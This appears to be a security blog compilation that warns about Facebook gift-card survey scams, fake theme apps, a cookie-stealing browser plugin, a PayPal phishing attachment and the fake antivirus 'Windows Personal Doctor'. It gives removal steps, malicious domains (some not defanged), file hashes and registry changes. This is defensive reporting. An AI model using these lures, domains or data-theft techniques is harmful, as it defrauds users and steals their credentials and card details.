"Get KFC Gift Card for FREE! (limited time only)" “Win Free Gift Cards For Mcdonald's”

"Get KFC Gift Card for FREE! (limited time only)" “Win Free Gift Cards For Mcdonald's” survey scam spreads viral across Facebook.

Free gift card scam is not new to Facebook and its users. In the past few years we have seen lot of similar scam messages. Below given are some of the famous gift card scam messages,

Walgreens is currently giving away 1 gift card to 10,000 lucky Facebook users!..

Cheesecake Factory is currently giving away $100.00 gift cards to all facebook users!!

Shell is currently giving away $100.00 gift cards to all facebook users!!

Get $1000 Kohls Gift Card for FREE! (limited time only)

Get Free SimCash in 5 minutes ! (Limited time offer)

FREE $500.00 Victoria Secret GiftCard!! (limited time only)

All these are survey scams. To know more about survey scams check this link http://www.hoax-slayer.com/what-is-a-survey-scam.shtml

Below shown is the screenshot of the scam post "KFC is currently giving away $100.00 gift cards to all facebook” posted on one of the affected facebook user’s wall.

Clicking on the link in the scam post will take you to a page like shown below. The page is designed to look like facebook page but it doesn’t belong to facebook always check the address bar. Here it is hxxp://freefboffers.net/kfcoffer.html

Following the steps given in the above page will invoke malicious java script in the background and will post the scam content in your Facebook wall.

Upon sharing the scam post in your fb wall it will pop up a window and depending upon your location / country it will say "to claim your free gift card you have to complete the survey first".

For every survey completed, spammers will earn money. You will not receive any gift card like promised. It’s all well designed to trick you fall into this scam and fill out surveys for them to earn money.

Similar to this one is the “Win Free Gift Cards For Mcdonald's” survey scam. A screenshot of this survey scam is shown below to make you aware.

Here it’s not a website, it’s a fake event created in Facebook. Mainly created to make people believe and fall prey to these scam. The above given steps 1 and 2 are just to invite your friend’s into this scam and to keep spreading this scam message among Facebook users. Step 3 takes you to a BlogSpot page like shown below where it will prompt you to fill surveys.

SCAM - Check Who Views Your Profile - Installs Adware

Below seen are the trending scam post spreading across Facebook in the past few weeks. Many Poland and US Facebook users are affected by these scam messages. Let's see how these scam post spread in Facebook and if infected how to get rid of these wall posts.

WOW! mój profil zostal odwiedzony 58 razy W JEDEN DZIEN, widze ze mam calkiem duzo podgladaczy LOL! Poznaj swoich na -> Link to Adware

Clicking on the link will lead to a page like seen below and will check whether you're using Firefox browser.

If so it will install iFamebook, an ad supported firefox browser plugin and will display unwanted ads while you use your Facebook.

Obviously spammers will earn their commission for delivering these plugin and ads. Remember there is no app / plugin / way to track your Facebook profile viewers so don't try and fall for these scams. To report these scam post, right click on the 'X' mark on the top right corner of the post and select report/mark as spam.

To remove the add-on go to Tools -> Add-ons in your Firefox browser and click remove like shown below,

WOW!!! Hello PlNK facebook !!! and goodbye blue facebook! You can now switch your facebook color and themes to 8 different colors thanks to the fb developer team! Get yours here --> Link to Fake apps

This is an old scam with new link and post text. When you click on the link it will redirect you to a fake Facebook app page like shown below,

Clicking on continue will try to install the fake app in your Facebook account. Here the fake app name is 'chgng my Thmes V7'.

But lot out there with random and junk names,

hxxp://apps.facebook.com/cleanestcolors/

hxxp://apps.facebook.com/ytrdgfxsdg/

hxxp://apps.facebook.com/pjknhyui/

hxxp://apps.facebook.com/donethjw/

hxxp://apps.facebook.com/uhjgtygf/

To get rid from these fake apps go to Home - > Account Settings -> Apps -> Remove in your Facebook.

OMG I Just Hate Miley Cyrus After Watching This Video - Survey Scam

An old variant of Facebook survey scam spreads viral with new post title "Miley cyrus seex tape leadked today on facebook" and offending thumbnail. Below seen is a sample wall post of that scam but lot out there with different blogspot links so be careful before you click on any blogspot links in Facebook.

Following the link in the wall post will lead to a page like seen below where it will tell you that you don't have the required plugin to watch the video and asks you to install a plugin named as "Youtube Premium" to watch the video. We have already seen many survey scam like these and we have already warned user to never, ever agree to install a plugin unless you have good reason to trust the source. Here its a malicious plugin attaches to your browser and spreads the scam message using your FB account and also brings in survey scam to fill.

Below seen is the survey scam the plugin brought to my test machine a typical FB survey scam in the name of age verification it asks users to fill survey so that spammers earn money. Since its a scam you will not see the video, irrespective of how many survey you complete.

Removal Instructions:

To get rid of this scam and the wall post go to settings -> extensions -> Remove in your Google Chrome browser.

Firefox users goto Tools -> Add-ons -> Remove

Technical Specifications:

Once the install plugin is clicked it contacts the site plugincodescript.blogspot.it and checks for the user browser whether it is Chrome or Firefox or Others depending upon that it pushes the plugin.

After the malicious plugin is installed it runs the script viralscripts.it/divx2/script.js whenever user open the browser. Script.js in turn calls viralscripts.it/divx2/extra.js.

The script extra.js contacts viralscripts.it/divx2/watch.php to identify user location and viralscripts.it/divx2/function.js to steal user cookies, generate random user comments and blogspot links.

Below you can see the script used to generate random blogspot links and appends it to the scam message depending upon user location.

Here you can see it generates random user comments and post the same in the infected user wall.

Below is the list of domains participated in spreading this scam, 

hxxp://ectisouginesdv.blogspot.fr

hxxp://ubpativeinflav.blogspot.it/

hxxp://fundseqboonths.blogspot.com

hxxp://plugincodescript.blogspot.it

hxxp://backedsbconfin.blogspot.jp

hxxp://citravtwor.blogspot.ca

hxxp://cialibervert.blogspot.ca

hxxp://cialibervert.blogspot.in

hxxp://cialibervert.blogspot.co.nz

hxxp://cialibervert.blogspot.com.es

hxxp://cialibervert.blogspot.com

hxxp://cialibervert.blogspot.co.uk

hxxp://cialibervert.blogspot.de

hxxp://cialibervert.blogspot.com.ar

hxxp://redirectingtocipa.blogspot.com

hxxp://viralscripts.it/divx2/watch.php

hxxp://viralscripts.it/divx2/youtube.crx

hxxp://viralscripts.it/divx2/youtube.xpi

RockMelt is a virus - Hoax

The latest hoax message spreading among Facebook users is shown below. The content in the message is false and it doesn't contain anything malicious like it said in the post. Sad thing is many people blindly spread the hoax message without knowing anything about RockMelt. 

So, What is RockMelt? It is nothing but a Social web browser like any other browser out there with some additional functions like adding many social networking apps and gets instant updates. Below you can see after installation of the RockMelt browser you will be prompted with the below window. If you want you can use your Facebook account with this browser to get quick updates else click cancel and use it like normal web browser.

Here I have logged in using FB account to show you how it works. It gets added as any other Facebook apps to get updates from user wall and display it to them as an update.

You can also restrict the permission granted to this application at the time of installation so it does nothing without user knowledge which proves its legitimacy. You can also see in the bottom of the below image where it clearly says why it needs these permission from an Facebook user.

Below you can see how the browser looks once it gets installed. In the left corner you can see the list of apps added to the browser and gives you instant update. 

When you try to chat in Facebook through RockMelt social web browser there is an option to send invite to your friends to install RockMelt. This is what misunderstood by many chat users due to many malware spreading through FB chat by providing link to download an executable file but in this case its a legitimate link.

When the user clicks on the "Send RockMelt Invite" it will send an invite to the user's friend through chat like seen below. The link takes them to the RockMelt website so nothing to worry its well known legitimate site. If you want you can install them else ignore.

You can add many apps to your social web browser to keep auto updated. To know more about RockMelt browser check out this link http://www.rockmelt.com/about.html

Also RockMelt browser is available in App Store for Iphone users http://itunes.apple.com/us/app/rockmelt/id416256246?mt=8

Survey Scam - "2012 DOOMSDAY CONFIRMED: NASA WARNS BE PREPARED!!(LEAKED VIDEO)"

A new survey scam spreads viral across Facebook saying a leaked video of NASA confirms the 2012 DOOMSDAY so be prepared. Below seen is the sample post of the survey scam.

Clicking on the link in the wall post will take you to the blogspot page like seen below. This page has been designed to trick users and spread the scam. Everything you see here are fake it doesn't contain any video like expected. How do I say this? Scroll down to know what it contains actually.

When you click on the play icon you will be asked to share the video to play. How can it ask someone to share before knowing what it contains. It does because every time someone clicks on the share button the scam gets posted on their wall and their friends will view it in the news feed. Until you click on share it won't show anything.

You may ask how does it know whether you have clicked the share button? The answer is simple it uses a Java script function to identify whether the user has clicked it or not. Below seen are some of the JS function used in this malicious page.

Once you have shared the page the share button will be changed to play. When you click on play it will popup a webpage "http://watchmere.blogspot.com/" containing the survey to be filled. These surveys will change depending upon your location.

Like I said earlier nothing here like nasa video or any kind of video only it leads to survey to fill. We know already these surveys will benefit the scamster for every survey completed. Beware of these survey scams and stay away from clicking on fraudulent links. If you find something suspicious just Google them before clicking on them. Last but not least please report to Facebook when you come across such links.

Your Account has been Limited! Identity Issue PP-658-119-347 - Phishing mail

Phishing email targeting PayPal customers to steal user account information.

Below seen is the mail I received today which claims to be from PayPal. It says my PayPal account has been limited, and to restore my account access asks me to fill in the attached form.

The attached form “PP-658-119-347.htm” is an html file containing obfuscated java script.

Deobfuscation shows the original script used to collect personal information of the user.

On opening the mail attachment it displays a page similar to PayPal profile update. Its an html file well designed to look similar to PayPal. How do we know that? Here you haven’t logged into any account using your credentials but still you can see the logout button below as if you have logged in. Also, remember you have opened an HTML file not the original website check your address bar.

It collects basic profile information along with your PayPal password. Next page it checks which country you belong to. If you’re from US you will be prompted with additional box asking for “Social Security Number.” If Sweden prompts for “Personal identity number.” Likewise it displays based on the Country.

Finally it asks you to enter Credit/Debit card information. It even validates the input field if you try to ignore or enter invalid data it will pop up an alert message.

So, Where does it sends these information? The answer can be found below. It will POST the collected information to a remote site. The remote site may be a compromised site. Once account information are collected the hacker will use it.

Beware of these phishing email scams and avoid entering your personal information when prompted through email. Always go to the trusted secure site to update your personal and financial information.

Windows Personal Doctor – FAKE AV a new variant of Windows Personal Detective/ Windows Basic Antivirus

Windows Personal Doctor is the latest rogue security product spreading across the internet. Once infected with this Fake AV it terminates running instance of several security related process. Will display annoying fake alerts saying your system is infected. Usually these Fake AV’s are distributed through malicious domains, here the domain is security-safe-2012-ddgfdgff.info/cba49fa4efefc673/setup.exe. This 'setup.exe' is an archive containing the file '4fpx4r7s6b2f184.exe' you can extract it using 7-zip. Again '4fpx4r7s6b2f184.exe' is a password protected archive containing the original malware "Filesystemscan.exe". The reason for malware using multiple layer of protection is to evade from signature detection.

Filename: Setup.exe

MD5: AC0B10D6D112357731760EDAED700AEF

SHA-1: 17A1C899A0973BDDFEC0AA7A872720C75191390E

Filename: Filesystemscan.exe

MD5: 35A925E1586B5413932651E82F559EDF

SHA-1: B89A960E739DAC209F6E2F91EC8D5A1367BDAE6C

The “Filesystemscan.exe” upon execution does the following system changes,

C:\Documents and Settings\Administrator\Application Data\Protector-yiw.exe               

C:\Documents and Settings\Administrator\Application Data\result.db

C:\Documents and Settings\Administrator\Desktop\Windows Personal Doctor.lnk

C:\Documents and Settings\All Users\Start Menu\Programs\Windows Personal Doctor.lnk

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System   DisableRegedit 

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System   DisableRegistryTools

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System   DisableTaskMgr

HKCU\ Software\Microsoft\Windows\CurrentVersion\Run         Inspector \Application Data\ Protector-yiw.exe

It disables Windows Defender Service (WinDefend) and Microsoft Protection Service (msmpsvc). Also, prevents the user from running several security tools in the infected PC.

It does a fake scan on the system and shows some infection has been indentified but its all fake, they are designed to show some results so that people will fall prey for it. To make the user believe it inherits some of the legit system functions like Service Manager, Autorun(Startup) Manager, Process controller, etc.

Above seen results are predefined and they are retrieved from the file result.db and displayed. We already know result.db is dropped by this Trojan. So, it’s all fake to trick you buy the rogue product. Below seen is the hex view of result.db showing the data used for displaying in the fake results.

When you try to get rid of the infection by clicking remove all or clicking anywhere on the rogue program you will be only prompted with a window to activate the product.

Don’t ever enter your personal details when prompted by these rogue product; you will lose your money. Below seen is the fake payment window used by the Trojan to collect user Credit card and personal information.

Sites contacted by this Trojan:

http://galaint.online-secure-pay.info

http://online-secure-pay4.info/service/